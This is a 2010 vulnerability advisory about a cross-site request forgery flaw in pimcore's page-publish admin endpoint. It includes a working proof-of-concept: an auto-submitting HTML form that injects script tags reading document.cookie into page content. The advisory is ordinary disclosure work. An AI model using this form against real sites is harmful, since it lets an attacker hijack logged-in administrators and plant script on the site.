Cross-site Request Forgery (CSRF) in pimcore

2010-08-02T00:00:00
ID HTB22562
Type htbridge
Reporter High-Tech Bridge
Modified 2010-08-18T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered vulnerability in pimcore which could be exploited to perform cross-site request forgery attacks.

1) Cross-site Request Forgery (CSRF) in pimcore
The vulnerability exists due to insufficient validation of the request origin in /admin/page/save/task/publish. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and execute arbitrary HTML and script code in user`s browser in context of the vulnerable site. Successful exploitation requires that victim is logged-in and has access to administrative interface.
Exploitation example:
<form action="http://host/admin/page/save/task/publish" method="post" name="main" >
<input type="hidden" name="data" value='{"headernote": {"data": "Powerful CMS"><script>alert(document.cookie)</script>", "type": "textarea"}, "headline": {"data": "The truth about pimcore", "type": "input"}, "contentblock": {"data": ["1"], "type": "block"}, "blocktypecontentblock1": {"data": null, "type": "select"}, "sublinecontentblock1": {"data": "Content management ala pimcore", "type": "input"}, "contentcontentblock1": {"data": "<p>\n\tPimcore</p>\n\"><script>alert(document.cookie)</script>", "type": "wysiwyg"}}' />
<input type="hidden" name="id" value="1440" />
</form>
<script>
document.main.submit();
</script>